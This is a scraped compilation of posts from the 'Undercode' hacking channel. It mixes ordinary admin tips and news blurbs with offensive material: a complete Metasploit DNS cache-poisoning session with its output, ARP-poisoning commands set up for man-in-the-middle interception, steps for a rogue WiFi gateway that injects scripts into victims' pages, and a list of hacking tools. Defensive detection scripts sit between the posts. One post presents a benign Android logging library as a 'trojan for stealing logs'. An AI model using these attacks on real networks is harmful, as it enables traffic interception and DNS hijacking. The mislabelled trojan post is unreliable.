UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Why transfer data in HTTP headers:

1) HTTP headers usually carry predictable technical information, so not every logging and traffic-analysis program saves their contents. Apache, for example, usually stores HTTP header fields such as Referer and User-Agent (this depends on the configured log format). Apache can also be configured to save data submitted by the POST method, but this is usually not done, because the logs start to take up too much space.

2) Storing other HTTP header fields is possible in principle, but it requires enabling and configuring the mod_log_forensic module. This is also done infrequently, and it means storing a large amount of practically unnecessary data.

3) These logging gaps are the reason HTTP headers get used for data transfer: GET requests are saved almost always, POST requests are rarely saved, and HTTP headers are almost never saved.

4) Among the popular applications that use HTTP header fields to transfer data, the first that comes to mind is PhpSploit, "a hidden framework for subsequent exploitation": in short, a Trojan, a PHP backdoor for web servers.

@UndercodeTesting
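The logging gap described in this post is what mod_log_forensic closes, since it records every received header. The following is an added example (not code from the channel or from Apache) that parses forensic-log entries and flags headers outside an expected set that are oversized or look like encoded data; the allowlist, the thresholds and the sample log lines are assumptions constructed for illustration.

```python
import math
from collections import Counter
from urllib.parse import unquote

# Header names expected from ordinary clients; tune per site (assumption).
EXPECTED = {"host", "user-agent", "accept", "accept-language", "accept-encoding",
            "referer", "cookie", "connection", "content-type", "content-length"}

# Constructed sample in mod_log_forensic layout: +id|request line|Name:value|...
SAMPLE_LOG = [
    "+reqA|GET /index.php HTTP/1.1|Host:www.example.test%3a8080|"
    "User-Agent:Mozilla/5.0|Accept:text/html",
    "-reqA",
    "+reqB|GET /index.php HTTP/1.1|Host:www.example.test|User-Agent:Mozilla/5.0|"
    "X-Zz-Data:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    "-reqB",
]

def entropy(text):
    """Shannon entropy of a non-empty string in bits per character."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def parse_entry(line):
    """Return (request id, request line, headers) for a '+' entry, else None."""
    fields = line.rstrip("\n").split("|")
    if not line.startswith("+") or len(fields) < 2:
        return None  # '-id' lines only mark that the request completed
    headers = {}
    for field in fields[2:]:
        name, _, value = field.partition(":")
        # The module %-escapes delimiter characters in values (':' becomes %3a).
        headers[name.strip().lower()] = unquote(value)
    return fields[0][1:], fields[1], headers

def unusual_headers(headers, max_len=256, min_entropy=4.5):
    """Flag headers outside EXPECTED that are long or look like encoded data."""
    findings = []
    for name, value in headers.items():
        if name in EXPECTED:
            continue
        if len(value) > max_len:
            findings.append((name, "oversized"))
        elif len(value) >= 32 and entropy(value) >= min_entropy:
            findings.append((name, "high-entropy"))
    return findings

def scan(lines):
    """Map request id -> findings for every logged request that has any."""
    report = {}
    for line in lines:
        entry = parse_entry(line)
        if entry and (hits := unusual_headers(entry[2])):
            report[entry[0]] = hits
    return report

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```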
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 BEST NETWORK HACKING:

ARP Poisoning and Sniffing
DHCP Discover and Starvation
Subdomains Identification
Certificate Cloning
TCP Analysis (ISN, Flags)
Username check on social networks
Web Technologies Identification
and a lot more!

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/fportantier/habu.git

2) cd habu

3) habu.arp.ping [OPTIONS] IP

A) Send ARP packets to check whether a host is alive on the local network.

Example:

# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding

Options:
-i TEXT Interface to use
-v Verbose output
--help Show this message and exit.

habu.arp.poison
Usage: habu.arp.poison [OPTIONS] VICTIM1 VICTIM2

B) Send ARP 'is-at' packets to each victim, poisoning their ARP tables so that
they send their traffic to your system.

Note: If you want a full working Man In The Middle attack, you need to
enable the packet forwarding on your operating system to act like a
router. You can do that using:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Example:

# habu.arp.poison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...

Options:
-i TEXT Interface to use
-v Verbose
--help Show this message and exit.

habu.arp.sniff
Usage: habu.arp.sniff [OPTIONS]

C) Listen for ARP packets and show information for each device.

Columns: Seconds from last packet | IP | MAC | Vendor

Example:

1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd

Options:
-i TEXT Interface to use
--help Show this message and exit.

habu.asydns
Usage: habu.asydns [OPTIONS]

D) Requests a DNS domain name based on public and private RSA keys using the
AsyDNS protocol https://github.com/portantier/asydns

AND MUCH MORE

@UndercodeTesting
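The poisoning output above has a recognisable shape: a single MAC address announcing itself for several IP addresses. The following is an added example (not part of habu or of the original post) that reads reply lines in that format and reports IPs whose MAC differs from a known-good baseline and MACs that answer for more than one IP; the baseline entry for 192.168.0.77 and the capture itself are constructed.

```python
import re
from collections import defaultdict

# Matches ARP reply lines in the format the page shows.
REPLY = re.compile(
    r"ARP is at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) says (\d+(?:\.\d+){3})", re.I)

# Known-good IP -> MAC pairs. The first entry comes from the page's sniff table;
# the second MAC is constructed for this example.
BASELINE = {
    "192.168.0.1": "a4:08:f5:19:17:a4",
    "192.168.0.77": "02:00:00:00:00:77",
}

# Constructed capture: one legitimate reply, then one MAC answering for two hosts.
CAPTURE = [
    "Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding",
    "Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77",
    "Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.1",
    "Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77",
]

def parse_replies(lines):
    """Yield (ip, mac) for every ARP reply line; other lines are ignored."""
    for line in lines:
        match = REPLY.search(line)
        if match:
            yield match.group(2), match.group(1).lower()

def detect_poisoning(lines, baseline):
    """Report IPs whose MAC left the baseline and MACs answering for several IPs."""
    ips_by_mac = defaultdict(set)
    reported = set()
    alerts = []
    for ip, mac in parse_replies(lines):
        ips_by_mac[mac].add(ip)
        known = baseline.get(ip)
        if known and known != mac and (ip, mac) not in reported:
            reported.add((ip, mac))  # one alert per changed pair, not per packet
            alerts.append(f"{ip} changed from {known} to {mac}")
    for mac in sorted(ips_by_mac):
        ips = sorted(ips_by_mac[mac])
        if len(ips) > 1:
            alerts.append(f"{mac} answers for {len(ips)} IPs: {', '.join(ips)}")
    return alerts

if __name__ == "__main__":
    for alert in detect_poisoning(CAPTURE, BASELINE):
        print(alert)
```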
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Creating a project on OpenShift:

1) Create a project on OpenShift.

This can be done using the command line interface or the web console.

$ oc new-project test
Now using project "test" on server "https://api.devocp.example.com:6443".

2) Then you can list all available projects to make sure the one you just created is available.

$ oc get projects

Granting user access to an OpenShift project

3) You must have users who already have access to the OpenShift cluster before you can grant them permission to access the project.

There are several providers that can be used to authenticate users in OpenShift, such as HTPasswd:

🦑 OpenShift / OKD user management with HTPasswd identity provider:

You can get a list of users who are already logged into the cluster with the oc get users command:

$ oc get users
JKMUTAI 17a06002-b543-4fa9-bfa8-92e510646d0a Josphat Mutai

4) Grant the user access to the project with a role binding.
The syntax used is:

$ oc adm policy add-role-to-user <role> <user> -n <projectname>

To assign the edit role to user JKMUTAI in the test project (test), I will run the following command.

$ oc adm policy add-role-to-user edit JKMUTAI -n test
clusterrole.rbac.authorization.k8s.io/edit added: "JKMUTAI"

For a cluster role, use the command below. A cluster role binding applies to every project, so it takes no -n project flag:

$ oc adm policy add-cluster-role-to-user edit JKMUTAI

5) To remove a user role use:

$ oc adm policy remove-role-from-user <role> <user> -n <projectname>
$ oc adm policy remove-cluster-role-from-user <role> <user>

6) If you want to get a list of users who have access to the project, run the following command:

$ oc get rolebindings -n <projectname>
$ oc get rolebindings <rolename> -n <projectname>

You can log in from the CLI or Console and confirm that you can switch to the project to deploy applications.

$ oc login

Switch to the project with the command:

$ oc project test
Already on project "test" on server "https://api.example.com:6443".

7) Deploy the test application.

oc apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: command-demo
  labels:
    purpose: demonstrate-command
spec:
  containers:
  - name: command-demo-container
    image: debian
    command: ["printenv"]
    args: ["HOSTNAME", "KUBERNETES_PORT"]
  restartPolicy: OnFailure
EOF

8) Confirm that the container is running:

$ oc get pods

@UndercodeTesting
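After granting roles as in steps 4 to 6, an access review of the project is the natural check. The following is an added example (not from the original post) that reads role bindings in the JSON form produced by `oc get rolebindings -n test -o json` and lists subjects holding a write-capable role who are not on an approved list; the sample data, the user contractor1 and the approved list are constructed.

```python
import json

WRITE_ROLES = {"admin", "edit"}  # default roles that can modify project resources

# Constructed stand-in for the output of `oc get rolebindings -n test -o json`.
BINDINGS = json.loads("""
{"kind": "List", "items": [
  {"metadata": {"name": "edit", "namespace": "test"},
   "roleRef": {"kind": "ClusterRole", "name": "edit"},
   "subjects": [{"kind": "User", "name": "JKMUTAI"}]},
  {"metadata": {"name": "admin-0", "namespace": "test"},
   "roleRef": {"kind": "ClusterRole", "name": "admin"},
   "subjects": [{"kind": "User", "name": "contractor1"}]},
  {"metadata": {"name": "view", "namespace": "test"},
   "roleRef": {"kind": "ClusterRole", "name": "view"},
   "subjects": [{"kind": "Group", "name": "auditors"}]},
  {"metadata": {"name": "stale", "namespace": "test"},
   "roleRef": {"kind": "ClusterRole", "name": "edit"},
   "subjects": null}
]}
""")

def grants(binding_list):
    """Yield (role, 'Kind/name') for every subject of every role binding."""
    for binding in binding_list.get("items", []):
        role = binding["roleRef"]["name"]
        # A binding whose subjects were all removed can carry null here.
        for subject in binding.get("subjects") or []:
            yield role, f'{subject["kind"]}/{subject["name"]}'

def access_by_role(binding_list):
    """Map role name -> sorted list of subjects bound to it."""
    table = {}
    for role, subject in grants(binding_list):
        table.setdefault(role, set()).add(subject)
    return {role: sorted(subjects) for role, subjects in sorted(table.items())}

def unapproved_writers(binding_list, approved):
    """Subjects with a write-capable role that are missing from the approved set."""
    return sorted({subject for role, subject in grants(binding_list)
                   if role in WRITE_ROLES and subject not in approved})

if __name__ == "__main__":
    print(access_by_role(BINDINGS))
    print(unapproved_writers(BINDINGS, approved={"User/JKMUTAI"}))
```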
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Speed up Linux tips:

> Reduce the default grub load time:

>Manage startup applications:

>Install preload to speed up application load time:

>Choose the best mirror for software updates:

>Use apt-fast instead of apt-get for a speedy update:

>Remove language related ign from apt-get update:

>Reduce overheating by disabling system services

#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DOM-based or local XSS

DOM-based or local XSS attacks: typically a free Wi-Fi network is offered, and the gateway behind it inserts a script into any page you visit or directly returns a phishing page, thereby implanting malicious scripts. Because the script is placed directly in the page rather than being returned by the server, this is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After a user connected to the Wi-Fi opens any website, the request is intercepted by us. We forward it to the real server according to the Host field in the HTTP header.

3. After receiving the data returned by the server, we can inject the webpage script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.
#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What process is listening on a port on Windows?

1) Using the command line
Use the following command to find the process ID (PID) listening on port 443.

You can change this value to look for a different port.

netstat -aon | findstr ":443" | findstr "LISTENING"

Output:

TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2180
TCP 127.0.0.1:44312 0.0.0.0:0 LISTENING 4620
TCP [::]:443 [::]:0 LISTENING 2180


The last column of the output displays the process ID.

The output shows the PIDs 2180 and 4620 for processes listening on port 443.

Use this process ID with the tasklist command to find the process name.

tasklist /fi "pid eq 2180"


2) Using PowerShell Get-Process
The second method uses a PowerShell command to identify the process running on a specific port on Windows.

Start a PowerShell terminal and run the following command to find the name of the process running on port 443.

You can change the port number to check for other ports.

Get-Process -Id (Get-NetTCPConnection -LocalPort 443).OwningProcess

@UndercodeTesting
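The findstr filter in method 1 is a text match, so the 127.0.0.1:44312 row (PID 4620) is returned alongside the real port 443 listeners. The following is an added example (not from the original post) that parses the same netstat rows, matches the local port exactly, and separates listeners bound to all interfaces from loopback-only ones; the function names are this example's own.

```python
# The three rows from the netstat output shown above, in netstat's column layout.
NETSTAT_OUTPUT = """\
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2180
  TCP    127.0.0.1:44312        0.0.0.0:0              LISTENING       4620
  TCP    [::]:443               [::]:0                 LISTENING       2180
"""

LOOPBACK = ("127.", "[::1]")

def listening_rows(netstat_output):
    """Yield (local_address, local_port, pid) for TCP sockets in LISTENING state."""
    for line in netstat_output.splitlines():
        cols = line.split()
        if len(cols) != 5 or cols[0] != "TCP" or cols[3] != "LISTENING":
            continue
        # rpartition splits on the last ':' so '[::]:443' keeps its address intact.
        address, _, port = cols[1].rpartition(":")
        if port.isdigit() and cols[4].isdigit():
            yield address, int(port), int(cols[4])

def pids_on_port(netstat_output, port):
    """PIDs whose local port is exactly `port`."""
    return {pid for _, p, pid in listening_rows(netstat_output) if p == port}

def pids_by_text_match(netstat_output, port):
    """What the findstr pipeline returns: any LISTENING row containing ':<port>'."""
    needle = f":{port}"
    return {int(line.split()[-1]) for line in netstat_output.splitlines()
            if needle in line and "LISTENING" in line}

def exposure(netstat_output, port):
    """Map pid -> 'loopback only' or 'reachable from the network' for that port."""
    result = {}
    for address, p, pid in listening_rows(netstat_output):
        if p != port:
            continue
        local = address.startswith(LOOPBACK)
        if not local or pid not in result:
            result[pid] = "loopback only" if local else "reachable from the network"
    return result

if __name__ == "__main__":
    print("exact match:", pids_on_port(NETSTAT_OUTPUT, 443))
    print("text match: ", pids_by_text_match(NETSTAT_OUTPUT, 443))
    print("exposure:   ", exposure(NETSTAT_OUTPUT, 443))
```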
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
New Vulnerability in Apache could allow attackers to exploit logins.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
New Vulnerability in Ubuntu could allow attackers to gain root access.
#Vulnerabilities
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Basic Linux commands:

pwd. Show the current (working) directory.
[user@testhost ~]$ pwd
/home/user

date. Display the current date and time of the system.

w. This command shows who is logged in to the system.

ls. Print directory contents.

cd. Change the current directory.

mkdir. Create directory.

rm. Delete a file.

cp. Copy file or directory.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to enable Night Shift on unsupported Macs?

MacBookPro9,x
iMacPro1,x
iMac13,x
Macmini6,x
MacBookAir5,x
MacPro6,x
MacBook8,x

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

1) Open the Installer in the Root of the Repository
https://github.com/TMRJIJ/Night-Shift-on-Unsupported-Macs

2) Follow the steps and agree to the terms

3) Accept & Install

4) Upon Completion, Restart your Mac

5) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.

6) Open the Terminal app in your Applications Folder

7) Drag 'Enable NightShift.sh' into the Terminal window and follow the instructions

8) After patching, restart your Mac.

9) You will see that the Night Shift tab is now available in System Preferences > Display as well as the toggle at the top of your Notification Center.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Best wireless debugging for Android devices:

https://dl.google.com/android/repository/platform-tools-latest-windows.zip (debug via windows)
Forwarded from UNDERCODE NEWS
Apple’s official website enters maintenance status: iPhone 12 mini opens pre-order tonight.
#international
Forwarded from UNDERCODE NEWS
Through NVIDIA Cloud Games, iOS users will be able to replay “Fortress Night”
#international #Updates
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SOME HACKER TOOLS:

- CrawlBox - Easy way to brute-force web directory. https://github.com/abaykan/CrawlBox/stargazers/

- TrackOut - Simple Python IP Tracker. https://github.com/abaykan/TrackOut/stargazers/

- sslcaudit - No description provided. https://github.com/abbbe/sslcaudit/stargazers/

- Sublist3r - Fast subdomains enumeration tool for penetration testers. https://github.com/aboul3la/Sublist3r/stargazers/

- doork - Passive Vulnerability Auditor. https://github.com/AeonDave/doork/stargazers/

- sir - Skype Ip Resolver. https://github.com/AeonDave/sir/stargazers/

- xl-py - No description provided. https://github.com/anggialberto/xl-py/stargazers/

- netdiscover - netdiscover. https://github.com/alexxy/netdiscover/stargazers/

- ATSCAN - Advanced dork Search & Mass Exploit Scanner.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A TROJAN FOR STEALING LOGS:

F E A T U R E S :
Concise API: logging can be implemented in a few lines of code;

Uses the AOP technology of the Lancet SDK, which makes it convenient to collect common logs and also supports incremental compilation;

Uses mmap to keep log writing efficient;
Extensible: developers can customize how log files are uploaded;

Low traffic overhead: whether a user's log file is uploaded is controlled remotely through online configuration;

High stability: it runs stably in many apps.

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD https://github.com/eleme/Trojan

Add in the root directory's build.gradle:

buildscript {
    dependencies {
        ......
        classpath 'me.ele:lancet-plugin:1.0.2'
    }
}

Add in the app directory's build.gradle:

apply plugin: 'me.ele.lancet'

dependencies {
    ......
    provided 'me.ele:lancet-base:1.0.2'
    compile 'me.ele:trojan-library:0.0.5'
}

Use

1) Initialization
Add in the custom Application:

TrojanConfig config = new TrojanConfig.Builder(this)
        // Set user information
        .userInfo("xxxx")
        // Set device id
        .deviceId("xxxx")
        // Set the cipher key if logs need to be encrypted
        .cipherKey("xxxx")
        // Optional, log files are saved on the sdcard by default
        .logDir("xxxx")
        // Console log switch, enabled by default
        .enableLog(true)
        .build();
Trojan.init(config);

🦑 Special Note:

The log files are stored on the sdcard by default and will not be lost even if the application is uninstalled;
For compatibility with multiple processes, each process stores its log files in its own directory;
The log is not encrypted by default; we currently only provide TEA encryption, chosen for its high efficiency.

2) Record the log
Trojan provides two ways to record a log:

Firstly:

Trojan.log("Trojan", "We have a nice day!");

Secondly:

// needs: import java.util.LinkedList; import java.util.List;
List<String> msgList = new LinkedList<>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);

By default, a single-line log is not encrypted; if you need to encrypt it, use the following:

Trojan.log("Trojan", "We have a nice day!", true);

3) User Information
When the user information changes or the user is switched, you can call:

Trojan.refreshUser("new user info");

Of course, if the user logs out, you can pass a null value:

Trojan.refreshUser(null);
4) Upload Solution
In the demo we provide a free and simple way, such as LeanCloud, to upload log files; you can browse and download the log files.

5) Data Decryption
When an encryption key is set, individual log entries can be encrypted to protect sensitive data. The encrypted data must be decrypted when the log is analyzed. Use the decryption script as follows:

Compile and generate the decryption .so library on a Mac. The .so library has already been generated in the repository, so this step can be omitted:

gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c

Call the Python script to decrypt the data on a Mac. You need to pass in the decryption key and the path of the file to be decrypted; pay attention to the path of the Python script:

python ./trojan_decrypt.py cipher-key cipher-file-path
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D
dns01.metasploit.com.

Use for learning!!
@UndercodeTesting
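The FAIL line in the check output above is the finding a resolver operator needs to act on. The following is an added example (not part of the original post or of Metasploit) that classifies the probed source ports and computes how likely a spoofed reply is to match, using the run's 20 spoofed responses per query; the 64,000-port figure for a randomizing resolver and the 0.8 threshold are assumptions.

```python
import re

# The five probe lines from the `check` output quoted above.
CHECK_OUTPUT = """\
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
"""

PROBE = re.compile(r"ADDRESS:\s*\S+\s+PORT:\s*(\d+)")

def observed_ports(text):
    """Source ports the resolver used for its outgoing queries, in order."""
    return [int(port) for port in PROBE.findall(text)]

def port_verdict(ports, min_distinct_ratio=0.8):
    """Classify source-port behaviour from a handful of observed queries."""
    if len(ports) < 2:
        return "insufficient data"
    distinct = len(set(ports))
    if distinct == 1:
        return "static"
    return "randomized" if distinct / len(ports) >= min_distinct_ratio else "weak"

def poison_probability(attempts, spoofs_per_attempt, port_space=1):
    """Chance that at least one spoofed reply matches within `attempts` queries.

    A reply is accepted only if its 16-bit transaction ID and its destination
    port match, so the space to guess is 65536 * port_space.
    """
    guesses = 65536 * port_space
    p_single = min(1.0, spoofs_per_attempt / guesses)
    return 1.0 - (1.0 - p_single) ** attempts

if __name__ == "__main__":
    ports = observed_ports(CHECK_OUTPUT)
    print("verdict:", port_verdict(ports))
    # Numbers from the run above: 20 spoofed responses per query, 13250 attempts.
    print("static port:      %.4f" % poison_probability(13250, 20))
    # Assumed pool of 64,000 random source ports after patching.
    print("randomized ports: %.6f" % poison_probability(13250, 20, port_space=64000))
```

With a static port the same effort succeeds about 98% of the time; with randomized source ports it drops to roughly 6 in 100,000.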
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁